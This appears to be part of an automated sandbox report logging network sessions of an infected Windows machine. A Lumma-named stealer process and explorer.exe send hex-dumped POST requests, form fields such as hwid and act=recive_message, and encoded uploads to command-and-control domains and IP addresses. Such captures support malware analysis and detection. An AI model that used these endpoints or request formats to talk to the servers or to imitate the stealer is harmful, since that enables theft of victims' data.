--be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8DA5CA009AFDFC139AE80332C094968D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
2024-07-27 06:54:39 UTC	15331	OUT	Data Raw: 3e 02 b1 94 95 c0 5f c2 9c d2 03 38 e3 2e c0 5a 3e 05 3c 98 2e 30 43 87 c5 96 75 cd a8 ad d6 85 58 0f dd c3 74 00 2b 3b 64 0e e1 68 46 aa d0 e4 ff 6f 27 a5 17 16 24 ae ca c2 03 00 de 47 68 5a 51 02 0a 7d 40 0b 6a 51 99 d1 b6 21 b2 09 3c 24 25 54 66 ba 2c 7e 6b f4 23 f4 f0 0b 77 09 c9 ed 01 f6 38 f4 63 88 3a bd 58 e8 d9 0a 58 25 68 92 a6 07 f0 bd 50 24 a4 07 47 61 89 1e 23 d5 ba b8 5c 9f ea 54 ed 82 93 3f f0 fd 11 72 e8 b6 78 0a 6b be 6f fc de 69 5e da 47 52 58 83 78 4e b7 07 fa 85 bc cd 68 99 14 98 6a a1 54 76 3d a0 3d b8 c3 dc cc 2e e4 73 7c 72 47 c3 7b a6 23 48 cf aa 46 d9 a1 aa 1e fd 4a cd 28 02 46 a6 08 11 5d a6 16 61 01 4a 99 6d 98 dc cb 64 6b 88 ec 14 02 c2 f9 c3 8d 49 bf c4 5d bc f1 67 41 13 87 4e 5f ba 54 c8 2f 11 3b ef d9 fe 6b d8 49 6a ff 58 e6 Data Ascii: >_8.Z><.0CuXt+;dhFo'$GhZQ}@jQ!<$%Tf,~k#w8c:XX%hP$Ga#\T?rxkoi^GRXxNhjTv==.s\|rG{#HFJ(F]aJmdkI]gAN_T/;kIjX
2024-07-27 06:54:39 UTC	15331	OUT	Data Raw: b1 ca ea 8b 65 56 08 7d 13 9a 15 9f 58 71 f7 83 26 ff ec 0a d4 00 02 6c 93 7a b7 4f f8 74 86 3a 87 85 04 a7 32 22 2f 0e 26 2d b8 58 c0 c1 27 b4 08 be 09 f3 d6 2a 95 09 db 98 a1 24 b3 2c 8b 38 03 34 11 c5 79 5c f4 ed 6f 85 d5 1a 49 0f 15 a6 f1 b8 52 fd cd 49 54 7d 69 d9 a6 fe 5c 52 1e c5 5b 70 a7 7a 51 42 95 e1 56 22 9b de 6a 4e f4 c6 e5 95 62 a5 bb ee 87 75 94 66 2f f1 e9 19 a7 72 90 c8 0a 87 91 e4 9e bc cb df 29 df de a2 88 c0 39 ff b9 1f 3f c2 a6 90 3c 3e 73 f6 c3 9f d3 04 26 e5 3a 17 93 50 c4 96 67 d5 bd eb cd b2 c8 7b ea b8 4e b4 08 fd be d6 78 4a 0c 55 7b c4 a1 ad 59 a5 3e 74 17 7b 24 dd 75 95 34 da 80 1a bb 00 ac e3 a9 84 19 c2 b2 cc af f7 c4 93 ae 4e 33 4a c3 ca 4f ec a8 39 70 d2 50 3c eb 9e 2f 4d 03 55 63 12 13 70 c9 6f 93 30 76 a1 a0 5d 17 f4 c9 Data Ascii: eV}Xq&lzOt:2"/&-X'*$,84y\oIRIT}i\R[pzQBV"jNbuf/r)9?<>s&:Pg{NxJU{Y>t{$u4N3JO9pP</MUcpo0v]
2024-07-27 06:54:39 UTC	15331	OUT	Data Raw: 26 21 2a 0e 41 4e 5d 73 7b 45 9d d7 2f 59 c3 7c 50 b0 74 ad 54 07 ad 92 a1 1b 86 f2 72 67 8c ba 4b 5b dc 4a bd b5 51 f4 c2 a7 79 01 ce a3 38 4f e8 4a 60 f2 fd ed 23 8b c5 5d 9d 4b 2e 08 1b fb e8 20 7e 72 cb 1f c1 4a 48 19 4c 15 db f1 87 7b 74 00 99 d6 bd d5 88 d0 49 0d 53 dc ab 9a b2 ad e4 2e 8b 71 b9 a1 dd 5b 25 1e 17 7f 5c 18 52 fe ba 0f 24 54 1f 70 66 bf f7 e9 74 7c ce bf 29 70 52 ec 4f c6 96 f5 9b e2 d9 f0 b6 7f 9a df 8f 84 58 2c c1 9a 64 8a 43 9e e2 a8 e2 0a f5 95 ec f0 9f 1e ca 54 e8 2a 33 86 b7 b6 95 f4 74 44 fc 34 a1 a1 bd b6 ba c8 86 5d 7c 34 ed 70 8c db c1 3d 96 72 56 c3 47 77 82 fe 5c 76 3c b6 7d 85 9f a8 81 c6 19 de 99 7f 73 23 6f 23 68 ab 5c 5c 7f 16 53 bc 1e 96 d4 51 d4 76 5d 54 ac b9 2d ad b0 38 77 73 3d 53 ee f5 4c 91 c1 f8 1e f6 98 ed 40 Data Ascii: &!AN]s{E/Y\|PtTrgK[JQy8OJ`#]K. ~rJHL{tIS.q[%\R$Tpft\|)pROX,dCT3tD4]\|4p=rVGw\v<}s#o#h\\SQv]T-8ws=SL@
2024-07-27 06:54:39 UTC	15331	OUT	Data Raw: 30 87 8f bd 9d ec c9 47 3e 28 65 80 60 ba aa 63 5c 1c 73 e4 9f 15 5a 66 08 84 1b dc 17 cd dd b4 8d c3 6a b0 ce 60 72 ce d3 5e 62 bc 0e cd e7 06 8b 60 07 37 9c 39 99 49 fc c6 bf 64 03 d1 14 d2 ba dd 49 aa e9 a7 8c 34 76 8b 64 58 ef 80 9b 0b 31 7d 4d c0 0b 2b 48 3c 15 f2 9b 89 87 19 1d 87 73 78 fe 8e be 80 0e 10 dd fe 55 c1 2e 6f 49 26 35 71 ac 01 d8 c9 fc c3 25 ae 8b c9 1a cc 4c 8e df e1 86 bc c9 b8 73 e0 42 dc 42 77 bd 75 f2 73 f2 e0 f4 99 4c 53 30 fb c0 58 2d 45 35 2a c2 53 a0 d7 18 cb 29 8f 40 29 d2 66 06 82 4d 18 79 6e ee 07 af 85 93 de c8 c5 ed cc 57 13 86 5d 99 e2 2b fc 27 71 be f4 ef c8 56 86 94 e0 65 0c 27 80 49 41 65 82 ce 69 bf 5a 8c 05 a4 7f 5e c2 4a bc 58 cf 8e c2 65 e9 84 cf 4b 5c 3d f6 8c 8e 11 35 a1 aa 22 80 e8 9f a8 eb ec 01 1d d2 f1 79 0f Data Ascii: 0G>(e`c\sZfj`r^b`79IdI4vdX1}M+H<sxU.oI&5q%LsBBwusLS0X-E5*S)@)fMynW]+'qVe'IAeiZ^JXeK\=5"y
2024-07-27 06:54:39 UTC	15331	OUT	Data Raw: d6 f8 f3 72 98 dd b2 a5 d5 56 f9 83 34 0c e5 00 06 4c e8 d3 1c 7f 01 45 37 b6 62 35 f0 ea 16 a3 08 07 04 b7 6c 96 43 d7 7f 73 2f 04 8f 7d c9 ca bc 16 7c a4 d9 b9 11 db 9a 75 51 17 bb 71 59 3d d5 0f 7d 8f 3b 48 65 88 b7 35 2f 6a f6 ca e9 9d c7 ba 3b 7a ff 52 0e d1 95 1f 82 ba 71 ec 54 d6 4d 82 10 98 89 25 92 b4 9f 85 75 ff 4f 4b 82 7c a4 dc b3 66 36 df ae f7 ab 2d e5 1c bf b8 48 7e fb 51 83 c9 07 0e b2 e9 20 03 0e 5e ff a9 da ff f1 ed 92 a7 58 95 32 53 c7 fa 5c 8d 34 21 ed 1f 92 16 e7 b2 40 ff ed 7d e3 a4 a6 c8 0f f5 fb 54 92 b0 20 db 5c e6 2c af 49 33 f2 9b 1f 12 69 75 bf 31 ab 00 78 eb 8d d7 7d d4 25 dc 50 b4 ce ac d5 b0 22 09 3f da b2 bc 48 69 d2 46 3e 9e c0 ac 88 5d 0f c4 71 1a 29 1e ba 22 2c e3 10 96 2c ec 3a 5a ab f3 75 75 17 37 a5 91 65 e6 b2 fd 5e Data Ascii: rV4LE7b5lCs/}\|uQqY=};He5/j;zRqTM%uOK\|f6-H~Q ^X2S\4!@}T \,I3iu1x}%P"?HiF>]q)",,:Zuu7e^
2024-07-27 06:54:39 UTC	15331	OUT	Data Raw: 9c 4f 55 5a b6 ad c6 e0 7a 9f 9a be e5 a9 a0 44 3b b3 7f d3 41 8d 1f 4b 70 ae 91 01 ae a3 b0 e3 08 9b 6d 32 20 c9 0a f9 9b 63 89 53 13 78 8c 75 a1 aa 05 80 41 f3 35 39 e8 e2 2b 28 2b 74 e5 58 56 ab 04 d1 03 c1 a3 09 b6 a5 9a 39 c7 b4 c4 c2 15 a4 cf 5d d9 db d2 e2 05 d3 73 b2 4b e1 05 09 f8 d6 66 c6 9f da 84 d6 64 12 27 97 1f 1b a1 a5 07 99 9c e3 22 09 a1 43 4e 8b e5 5c 67 74 e9 ba 88 85 5e 15 da df 5f 7e bd 4e 99 26 d1 0f 15 0b 26 e1 95 61 5d 3c a4 be f3 d7 39 95 c5 f7 e2 2a 27 8f e2 f7 7f ae c0 38 51 68 86 ed 0a 96 d0 e2 b1 ab 2c 0e 19 ae ee 19 a4 99 b9 30 55 8f e7 78 93 c3 aa 09 4d 7f 6c a8 9f 3f dc de 55 76 a0 c0 76 10 86 6d cb 70 57 99 40 be bc d4 e6 c5 68 eb c8 ba 4b 4c d9 15 be 87 e8 1c e2 6d 18 e4 3f fa da 4c 53 96 2d d2 25 d7 ab b6 b7 71 fa 67 b2 Data Ascii: OUZzD;AKpm2 cSxuA59+(+tXV9]sKfd'"CN\gt^_~N&&a]<9*'8Qh,0UxMl?UvvmpW@hKLm?LS-%qg
2024-07-27 06:54:39 UTC	15331	OUT	Data Raw: 33 f3 af 70 3c b6 9c 73 34 c5 3f 04 76 92 76 d6 03 bf a1 ed 63 68 6e a1 5d 80 9e 04 d9 5c 84 7d 47 d1 cb 79 ce 50 31 df 47 40 ef d9 79 fb 14 b1 52 f4 00 ed 7a aa a4 ac 3b 4d 6d 91 b2 f0 2a c5 83 35 ee 0f 47 08 e6 91 6f 8a cb db b0 cf 44 63 ac c5 30 ad d7 73 a8 ba 23 27 a3 58 2e 30 72 5d 5c 86 23 44 b9 7c 97 85 86 46 23 00 13 81 98 b9 11 ca ca 43 83 cc 7a 49 70 90 75 b2 ba ea 8f 95 8d 4e 0a 0b 2d df 05 72 1d 3e bc bf fa 92 c0 3a 0e 27 df d7 a0 08 c0 78 b6 c8 93 13 0c bb 03 c8 d5 32 88 1e 03 25 42 cc 8b 22 bc 85 71 61 43 9b a0 5a 7d 10 19 76 7d d1 c9 77 e3 52 a2 d3 a1 22 18 5d 9a fb 12 cd 7d 95 bc 76 2a 21 8c 79 e1 68 b7 31 93 b8 bb 9d 4e b2 13 ac 41 2f 74 9c 4f e3 9f f0 81 ed 62 7d 7e 9f 20 0b 60 8d 42 97 e5 09 29 77 54 60 5f 20 82 42 ba 71 9d ba 80 ba 1a Data Ascii: 3p<s4?vvchn]\}GyP1G@yRz;Mm5GoDc0s#'X.0r]\#D\|F#CzIpuN-r>:'x2%B"qaCZ}v}wR"]}v!yh1NA/tOb}~ `B)wT`_ Bq
2024-07-27 06:54:39 UTC	15331	OUT	Data Raw: de 57 4e be 70 db 03 88 98 b3 94 a7 48 f3 48 1d fa 91 f5 b6 83 25 90 50 7f a1 37 47 05 a1 72 94 7b c7 ea 8c cd 13 06 f9 c0 4e fa b4 45 db 6a a5 2a ea dd 43 56 98 c0 42 84 e0 92 50 da ca 71 e2 ae 95 4b a8 74 47 89 71 3e 9e 59 a9 c9 e9 e6 3c 38 46 ae fc 3a 8c e5 c3 35 3e a1 98 d2 f8 81 6f 6b 5a 2b ec 85 00 6e c1 33 7f 77 2a fa 2d 73 0a 51 c7 26 31 ab d5 f3 d5 fc e7 6f 66 44 b9 6f 14 9d 20 1c 58 c7 a7 84 41 68 be c9 44 7e 02 f5 eb c3 26 25 c4 71 d1 24 0a 16 17 4f e7 49 3b 10 02 18 18 cc cf 03 d1 cb 00 8d f5 f4 80 8d 1f 1b a0 4f ed fa 15 f8 49 4b 95 19 41 bf 48 0f ed ae 35 c6 cd a4 8c d3 f6 e9 6e a2 67 7d ea 9d a8 1b 5f 0c 82 5a 0c a6 d0 1d 21 36 fb 8f d6 e9 bc 4c 28 78 dd 51 6b ee 0c 17 07 e9 51 b7 7e 08 87 7c 78 3d 6c 3d 2c cf e0 d9 a2 f7 db a9 53 d5 58 89 Data Ascii: WNpHH%P7Gr{NEjCVBPqKtGq>Y<8F:5>okZ+n3w-sQ&1ofDo XAhD~&%q$OI;OIKAH5ng}_Z!6L(xQkQ~\|x=l=,SX
2024-07-27 06:54:39 UTC	15331	OUT	Data Raw: db 27 23 cb 0a ca 6a be c9 0d a1 ea b6 4f 62 01 f1 ef 8b bd 70 c4 0b c5 22 81 e4 bd 5d 1a 55 6c be 6d 45 b0 6b 51 11 1d c3 79 12 c8 8f 72 32 53 9c b4 37 66 26 29 d1 d0 1c c2 7f 0c e0 f9 f7 bb 50 82 5a 54 f9 05 87 b3 85 0d 7e ea 4e dd 94 d8 8c f5 df 83 b7 30 c6 7f a4 ca 73 51 b4 6e b2 7d 9b 33 c5 c8 31 8d 58 28 52 0c fc 4e d3 c8 20 5f 59 a2 ff 1e 49 3a 3a 91 59 c5 92 98 e2 9a 74 1d eb ed 40 5f e6 46 d3 71 08 ac f9 11 7c 07 f7 cc f5 f8 cb f3 46 30 5a 43 13 e0 c6 f1 2e 62 34 b1 58 4c 57 b2 97 b1 a3 30 ec fb df 16 8f d9 68 12 ff 11 79 44 91 99 cd f0 21 8c a0 fc cc aa a2 08 1f 4d 83 8c 8c d2 e3 bc 11 d1 41 2a 22 fa c6 e6 79 5b ed 6e b6 4c 4c d8 74 4f 0e 7a 5e 64 0b 12 50 19 1b bd 57 40 28 78 73 1b db 69 df 42 ec 12 97 bb e5 65 c8 45 a9 78 16 38 b9 1c 3c ac cb Data Ascii: '#jObp"]UlmEkQyr2S7f&)PZT~N0sQn}31X(RN _YI::Yt@_Fq\|F0ZC.b4XLW0hyD!MA*"y[nLLtOz^dPW@(xsiBeEx8<
2024-07-27 06:54:41 UTC	808	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 06:54:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vmhpj20vpcaem15i539svocve1; expires=Wed, 20-Nov-2024 00:41:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fhmznkqc7vkwCIVigsNlGMSep9fyaZ9IbfbmQE8b3LVT5t8fSuX8PQwRTlpPLUtdhbAmXOKLZATnC%2F0aeabeff0QPOZGAFPnd8Z2V%2FSe5ERZaGPkCkcG8QClsPvYQzbCf8od7fC%2FKQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ab82c2b7f7c84-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50733	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:40 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:54:40 UTC	1122	OUT	Data Raw: 63 7a 61 61 54 64 65 58 49 47 68 58 79 6d 58 38 63 74 2f 52 6c 65 32 76 6f 38 50 37 30 50 47 30 41 45 4e 65 66 77 59 6d 48 68 47 62 4f 34 75 34 47 36 39 6f 31 6c 42 48 35 64 48 32 50 35 6e 65 68 41 30 4a 4e 44 41 45 2b 68 53 66 71 73 48 76 2b 36 75 68 57 6a 33 56 39 63 55 35 4c 57 72 66 68 34 42 78 4b 7a 4a 7a 54 50 2f 2b 4c 35 5a 68 69 2f 43 62 36 4e 6d 67 7a 79 65 72 37 46 31 5a 36 76 61 4e 31 53 4d 70 4a 54 34 71 30 61 65 75 6e 78 53 79 5a 34 33 44 70 74 47 75 53 48 57 68 39 6d 66 6d 78 77 7a 2f 4a 54 2b 31 61 44 5a 4a 67 47 51 50 77 69 42 61 4a 47 62 4f 31 46 69 69 72 38 52 2f 41 44 49 55 6d 59 4c 78 32 4b 39 77 4e 71 2b 42 53 4c 45 38 32 36 52 2b 4e 4a 54 4c 74 6a 61 46 4d 6d 45 36 72 4d 77 49 52 73 6e 64 72 31 58 72 44 30 49 35 62 6b 72 53 43 74 63 Data Ascii: czaaTdeXIGhXymX8ct/Rle2vo8P70PG0AENefwYmHhGbO4u4G69o1lBH5dH2P5nehA0JNDAE+hSfqsHv+6uhWj3V9cU5LWrfh4BxKzJzTP/+L5Zhi/Cb6Nmgzyer7F1Z6vaN1SMpJT4q0aeunxSyZ43DptGuSHWh9mfmxwz/JT+1aDZJgGQPwiBaJGbO1Fiir8R/ADIUmYLx2K9wNq+BSLE826R+NJTLtjaFMmE6rMwIRsndr1XrD0I5bkrSCtc
2024-07-27 06:54:41 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:41 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:41 UTC	685	IN	Data Raw: 72 41 45 31 70 50 4f 39 79 36 61 6f 72 73 41 5a 38 6f 2b 30 4c 48 65 6e 79 30 44 65 51 4a 70 35 33 49 39 50 2b 57 4b 48 72 70 37 32 6c 61 30 4b 77 55 53 64 69 56 4b 6a 5a 57 72 55 44 69 4e 71 34 2b 50 35 31 56 67 6b 48 45 4d 30 4b 6c 37 4c 4b 45 67 74 69 45 58 51 61 30 44 63 46 35 4c 6e 63 38 4a 70 58 2b 44 63 41 6d 37 41 48 7a 74 66 4e 53 53 65 42 68 33 31 71 72 6d 6e 58 6d 42 61 57 38 74 4e 70 42 46 53 55 39 78 31 63 47 5a 57 46 39 4e 66 64 73 61 4d 5a 70 4b 55 37 34 4b 43 55 36 38 75 4c 4e 2b 57 6c 4e 74 30 57 6e 69 4b 65 75 63 78 70 79 38 36 43 72 4c 66 71 65 38 4d 6f 62 62 6a 58 32 76 71 68 4f 55 75 35 67 67 6f 34 6f 6b 77 75 51 54 51 35 70 65 75 33 75 59 76 35 67 70 4e 79 6d 42 6e 73 4b 64 4c 68 34 57 4b 79 56 31 69 71 4d 5a 48 65 57 39 43 52 76 56 Data Ascii: rAE1pPO9y6aorsAZ8o+0LHeny0DeQJp53I9P+WKHrp72la0KwUSdiVKjZWrUDiNq4+P51VgkHEM0Kl7LKEgtiEXQa0DcF5Lnc8JpX+DcAm7AHztfNSSeBh31qrmnXmBaW8tNpBFSU9x1cGZWF9NfdsaMZpKU74KCU68uLN+WlNt0WniKeucxpy86CrLfqe8MobbjX2vqhOUu5ggo4okwuQTQ5peu3uYv5gpNymBnsKdLh4WKyV1iqMZHeW9CRvV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50735	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:42 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 06:54:42 UTC	1267	OUT	Data Raw: 58 78 48 64 58 36 45 70 53 44 52 41 51 37 6b 31 47 46 6c 64 58 6c 64 35 57 62 5a 4c 70 38 66 42 5a 30 2b 62 79 49 47 34 50 39 43 50 65 49 39 45 6b 70 4f 41 6b 71 67 58 6f 50 42 73 6d 38 44 4f 33 53 30 52 4d 31 2b 53 52 64 73 52 45 6d 2f 5a 4d 38 48 70 62 67 6c 50 58 44 35 69 38 53 47 71 63 4f 43 73 44 74 63 65 37 32 43 35 49 53 57 66 4a 6d 66 2f 76 51 4f 4f 46 66 67 70 2b 54 57 74 64 64 35 72 6a 41 77 66 34 51 51 4a 78 71 55 46 41 53 78 2b 2b 38 6e 50 33 35 67 5a 58 57 61 45 43 34 61 51 53 66 53 4a 72 6c 41 48 6c 79 44 7a 74 61 38 32 31 57 72 7a 46 48 31 61 70 55 55 38 39 70 77 63 2b 2f 36 63 4e 78 46 37 48 4f 69 38 55 52 31 51 30 78 51 52 65 76 38 49 67 6c 49 36 39 5a 66 78 6f 6d 57 6b 53 4d 2b 34 78 35 6c 4b 48 68 63 74 41 71 42 4a 56 55 38 66 32 51 7a Data Ascii: XxHdX6EpSDRAQ7k1GFldXld5WbZLp8fBZ0+byIG4P9CPeI9EkpOAkqgXoPBsm8DO3S0RM1+SRdsREm/ZM8HpbglPXD5i8SGqcOCsDtce72C5ISWfJmf/vQOOFfgp+TWtdd5rjAwf4QQJxqUFASx++8nP35gZXWaEC4aQSfSJrlAHlyDzta821WrzFH1apUU89pwc+/6cNxF7HOi8UR1Q0xQRev8IglI69ZfxomWkSM+4x5lKHhctAqBJVU8f2Qz
2024-07-27 06:54:43 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:43 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:43 UTC	685	IN	Data Raw: 54 34 4e 4f 43 7a 6b 37 63 77 4a 35 6e 32 46 4f 31 51 77 44 52 79 47 50 57 33 5a 49 7a 72 62 48 31 71 47 4d 51 35 52 54 56 4c 51 34 4b 30 73 4a 48 4b 43 48 56 52 58 65 44 30 34 46 44 47 66 52 34 43 51 69 57 5a 45 43 77 58 66 52 39 77 74 47 58 68 72 77 37 57 47 76 39 77 30 77 2f 49 76 39 78 2f 4d 67 61 39 68 79 58 4c 50 55 32 71 46 6d 41 30 4e 4f 55 56 55 33 38 78 5a 48 73 72 6f 47 78 72 69 76 76 63 6d 76 7a 32 77 74 6a 7a 74 6f 73 31 65 56 39 37 39 5a 33 39 4f 4d 7a 6c 4a 61 59 36 61 70 6c 5a 31 79 77 59 30 48 55 71 6c 77 4c 75 58 31 5a 44 66 55 51 6e 36 6f 64 7a 34 58 53 65 4b 63 62 31 6d 6e 43 4d 6b 68 62 49 53 52 30 37 4a 69 50 64 56 78 76 2b 34 6a 31 4c 43 6a 4d 50 35 32 56 46 45 51 57 59 6e 58 36 4c 7a 70 67 31 7a 6f 6d 54 42 53 4d 49 50 34 75 52 4d Data Ascii: T4NOCzk7cwJ5n2FO1QwDRyGPW3ZIzrbH1qGMQ5RTVLQ4K0sJHKCHVRXeD04FDGfR4CQiWZECwXfR9wtGXhrw7WGv9w0w/Iv9x/Mga9hyXLPU2qFmA0NOUVU38xZHsroGxrivvcmvz2wtjztos1eV979Z39OMzlJaY6aplZ1ywY0HUqlwLuX1ZDfUQn6odz4XSeKcb1mnCMkhbISR07JiPdVxv+4j1LCjMP52VFEQWYnX6Lzpg1zomTBSMIP4uRM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50736	172.67.213.85	443	4936	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:42 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: liernessfornicsa.shop
2024-07-27 06:54:42 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-07-27 06:54:43 UTC	814	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 06:54:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=eufscjia79pk2kqi0q2ell3pnc; expires=Wed, 20-Nov-2024 00:41:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8EzlRnXa6w6g9KlhS0%2BhxgerxUzXQJzQIDt75Tmi2MNuVcPPgJ2W86Ng1J2ud%2B3%2F9LHbal1YBhoao38pnsuGQ8%2BTSGjppT%2BJDciWRW5UmQ3UcZtBbXd8GfD5MSgxAEub%2B%2Frj37rpjNE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ab83f0fe543fa-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 06:54:43 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-07-27 06:54:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50737	172.67.213.85	443	4936	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:43 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: liernessfornicsa.shop
2024-07-27 06:54:43 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 71 54 6f 59 72 4a 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=qToYrJ--&j=
2024-07-27 06:54:44 UTC	810	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 06:54:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vep1r0eaouhaqsvrv6o0l1366g; expires=Wed, 20-Nov-2024 00:41:23 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=buHr7pgRq3HE4tXb7SdHeF8vtdvPyszZaPb0%2BBupENhW%2BUPtTFDnx9i5naOBB6mwFCdL7cLKyRxcuDSJ%2Bz3tq0TS3l%2F5OX37LZqBdHGJMd0zSGfGRz8Id7uaAZmCwn%2BCxtXi6CKeDZw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ab844ef9e0c7c-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 06:54:44 UTC	559	IN	Data Raw: 34 64 64 0d 0a 6f 71 71 6d 67 41 53 4e 79 42 32 51 2f 46 2b 76 36 44 66 73 6c 61 74 59 56 39 78 7a 69 39 67 39 45 33 73 51 70 37 2b 4d 2b 45 4c 5a 69 4e 43 69 50 72 6e 6b 50 2b 4f 5a 66 5a 57 63 52 5a 6e 77 68 33 6f 32 75 46 47 78 76 6c 78 2f 43 48 57 4c 6e 66 71 56 59 4a 6a 4d 78 2b 78 33 36 4f 51 2f 39 59 52 39 6c 62 4e 4d 7a 76 44 46 65 6d 33 2b 46 75 47 36 58 48 38 5a 63 63 7a 51 2f 4a 51 68 79 73 62 42 36 47 48 75 72 48 7a 38 6b 54 72 4b 6a 56 61 47 2b 38 49 31 50 37 46 52 70 2f 70 59 61 56 6b 71 68 66 4c 70 6a 43 50 76 79 39 58 72 4a 76 44 6b 5a 72 4b 5a 4d 59 33 53 46 59 33 77 79 54 51 78 75 42 6a 6a 73 46 56 33 47 48 54 4e 7a 2b 57 65 4b 73 72 49 77 75 6c 72 35 37 68 78 39 70 59 78 7a 49 64 57 7a 72 6d 4a 50 53 33 2b 53 61 6e 70 62 58 49 49 59 39 Data Ascii: 4ddoqqmgASNyB2Q/F+v6DfslatYV9xzi9g9E3sQp7+M+ELZiNCiPrnkP+OZfZWcRZnwh3o2uFGxvlx/CHWLnfqVYJjMx+x36OQ/9YR9lbNMzvDFem3+FuG6XH8ZcczQ/JQhysbB6GHurHz8kTrKjVaG+8I1P7FRp/pYaVkqhfLpjCPvy9XrJvDkZrKZMY3SFY3wyTQxuBjjsFV3GHTNz+WeKsrIwulr57hx9pYxzIdWzrmJPS3+SanpbXIIY9
2024-07-27 06:54:44 UTC	693	IN	Data Raw: 50 53 69 76 48 68 61 4f 47 74 61 62 4b 42 63 39 54 4b 55 6f 4b 33 6b 58 6f 37 75 78 37 37 75 30 31 30 46 32 44 4a 32 4f 69 58 49 38 37 49 77 65 56 72 34 61 78 34 38 5a 59 35 7a 49 52 5a 68 50 54 4e 4f 58 58 77 55 65 36 69 48 79 6c 5a 51 38 62 5a 36 59 67 6a 7a 6f 6a 62 72 48 2b 76 72 58 4f 79 78 6e 33 48 6a 46 69 48 2f 4d 34 79 4f 61 77 61 35 72 6c 57 64 68 39 34 78 74 58 6b 6e 43 37 42 7a 38 48 6c 64 4f 47 68 63 76 47 55 4f 34 33 45 46 59 6e 76 69 57 4a 31 6b 42 4c 34 72 47 31 79 43 47 4f 46 77 71 43 44 59 4d 66 45 68 4c 6f 6d 35 71 4a 77 2f 35 4d 33 77 34 39 59 68 2f 62 49 4e 7a 4f 31 45 4f 47 79 57 33 59 5a 64 73 6a 53 34 4a 6f 75 79 4d 33 41 36 47 2b 76 35 44 2f 31 68 6e 32 56 79 6d 57 44 2b 38 49 32 64 34 73 53 35 37 52 59 5a 31 6c 74 69 38 53 75 